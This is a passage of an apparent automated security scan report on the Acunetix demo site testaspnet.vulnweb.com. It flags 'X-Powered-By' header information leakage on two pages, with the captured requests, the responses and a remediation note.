          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        8. GET http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 13914
          
          
          Response body (13914 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WBB8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhHwAFElJlYWROZXdzLmFzcHg/aWQ9M2QCBw8WAh8BBagBMjYgSmFudWFyeSAyMDA1IC0gQSBiZXRhIHZlcnNpb24gb2YgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciBoYXMgYmVlbiByZWxlYXNlZCB0b2RheS4gVGhlIGJldGEgaXMgYXZhaWxhYmxlIGZvciBkb3dubG9hZCBhdCBodHRwOi8vd3d3LmFjdW5ldGl4LmNvbS9kb3dubG9hZC8uZGQzP/MHHnstJY/fWtD4cYSdoYkheQ==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQLj8dP9DwKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9dpx0P1QE7KvkQnKR4Ij212SQ8lw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<a href="ReadNews.aspx?id=3" id="anchNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a>
          						<DIV id="divNewsShort" class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        9. GET http://testaspnet.vulnweb.com/default.aspx
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (316 bytes)
          GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

